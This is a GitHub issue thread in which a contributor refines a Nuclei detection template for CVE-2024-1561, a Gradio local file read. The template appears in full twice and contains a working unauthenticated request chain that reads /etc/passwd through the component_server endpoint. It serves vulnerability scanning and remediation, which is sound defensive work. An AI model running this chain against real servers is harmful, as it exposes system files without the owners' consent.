Closed DiabloHTB closed 4 months ago
Check here for usage and output https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561/tree/main
@DhiyaneshGeek I have an improvement to this for the regex part before this gets added :
""
and to use that as variable instead of just the hash, making this applicable even if they don't have the gradio
folder /tmp/anything/hash/passwd
instead of just /tmp/gradio/hash/passwd
id: CVE-2024-1561
info:
name: CVE-2024-1561
author: Diablo
description: |
Local file read by calling arbitrary methods of Components class
severity: HIGH
impact: |
Successful exploitation of this vulnerability could allow an attacker to read files on the server
remediation: |
Update to Gradio 4.13.0
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1561
reference:
- https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
- https://github.com/DiabloHTB/CVE-2024-1561
- https://nvd.nist.gov/vuln/detail/CVE-2024-1561
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561
metadata:
max-request: 1
vendor: Gradio
product: https://github.com/gradio-app/gradio
tags: cve,cve2024,intrusive,unauth,gradio,path-traversal
http:
- raw:
- |
GET /config HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: first-component
part: body
group: 1
json:
- '.components[0].id'
internal: true
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "{{first-component}}",
"data": "/etc/passwd",
"fn_name": "move_resource_to_block_cache",
"session_hash": "aaaaaaaaaaa"}
extractors:
- type: regex
name: tmpath
regex:
- \/[a-zA-Z0-9\/]+
internal: true
- raw:
- |
GET /file={{tmpath}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
Hi @DiabloHTB
this below part only updated right ?
extractors:
- type: regex
name: tmpath
regex:
- \/[a-zA-Z0-9\/]+
internal: true
@DhiyaneshGeek Hey there, that part and the last request changed from GET /file=/tmp/gradio{{tmpath}}passwd HTTP/1.1
to GET /file={{tmpath}} HTTP/1.1
since i know have the full path not just the hash, below is the full signed template, let me know if I need to add something this is my first template
id: CVE-2024-1561
info:
name: CVE-2024-1561
author: Diablo
description: |
Local file read by calling arbitrary methods of Components class
severity: HIGH
impact: |
Successful exploitation of this vulnerability could allow an attacker to read files on the server
remediation: |
Update to Gradio 4.13.0
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1561
reference:
- https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338
- https://github.com/DiabloHTB/CVE-2024-1561
- https://nvd.nist.gov/vuln/detail/CVE-2024-1561
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1561
metadata:
max-request: 1
vendor: Gradio
product: https://github.com/gradio-app/gradio
tags: cve,cve2024,intrusive,unauth,gradio,path-traversal
http:
- raw:
- |
GET /config HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: first-component
part: body
group: 1
json:
- '.components[0].id'
internal: true
- raw:
- |
POST /component_server HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"component_id": "{{first-component}}",
"data": "/etc/passwd",
"fn_name": "move_resource_to_block_cache",
"session_hash": "aaaaaaaaaaa"}
extractors:
- type: regex
name: tmpath
regex:
- \/[a-zA-Z0-9\/]+
internal: true
- raw:
- |
GET /file={{tmpath}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body
# digest: 490a0046304402203c6137fea5301e4c6d68e46f20ce0a6c5a88919d747eecf8b4f4df9773d84845022031b061bfbc332f22390d9ea69831e2f94586cc49fd8a1b1419dd39c2a8dda8d1:9c69f0f6a1e1d9ed8dd8d3f14441892c
Hi @DiabloHTB i'll update the PR #9800 from my side
You can grab your cool PD stickers over here http://nux.gg/stickers 😄
Thanks for sharing the updated template
Template Information:
Local file read by calling arbitrary methods of Components class in Gradio 4.12.0, the template I created detects this by trying to get the
/etc/passwd
and matching with the wordroot
using three requests :/config
and extracting the id of the first component/component_server
and using the previously extracted id to get the temporary path of the/etc/passwd
, the response is in double quotes, using regex to extract the hash inside it and using in the next request -------NOTE------This step can be improved by extracting the whole path without double quotes using regex, I couldn't find a way to do this.
tmpath
to get the/etc/passwd
using the already extracted hash, example "/tmp/gradio/{{tmpath}}passwd" and match with the word "root:[x*]:0:0:"Gradio https://github.com/gradio-app/gradio Full writeup and Python script to exploit: https://huntr.com/bounties/4acf584e-2fe8-490e-878d-2d9bf2698338 Sh PoC was created by me:https://github.com/DiabloHTB/CVE-2024-1561
Nuclei Template:
Example output :